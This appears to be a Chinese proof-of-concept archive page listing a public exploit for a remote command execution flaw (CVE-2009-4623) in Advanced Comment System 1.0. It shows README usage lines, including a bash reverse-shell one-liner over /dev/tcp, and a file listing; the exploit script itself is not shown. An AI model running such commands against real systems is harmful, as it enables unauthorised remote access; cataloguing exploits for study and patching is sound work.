关联漏洞
描述
Advanced Comment System 1.0 - Remote Command Execution (RCE)
介绍
# Advanced Comment System 1.0 - Remote Command Execution (RCE)
> https://nvd.nist.gov/vuln/detail/CVE-2009-4623
## Examples
```bash
python3 exploit.py http://127.0.0.1 uname -a
```
```bash
python3 exploit.py http://127.0.0.1 'bash -i >& /dev/tcp/127.0.0.1/443 0>&1'
```
文件快照
[4.0K] /data/pocs/00c86148bee7c284c5f118c17fb46ac14099b0cb
├── [1.7K] exploit.py
├── [1.0K] LICENSE
└── [ 272] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。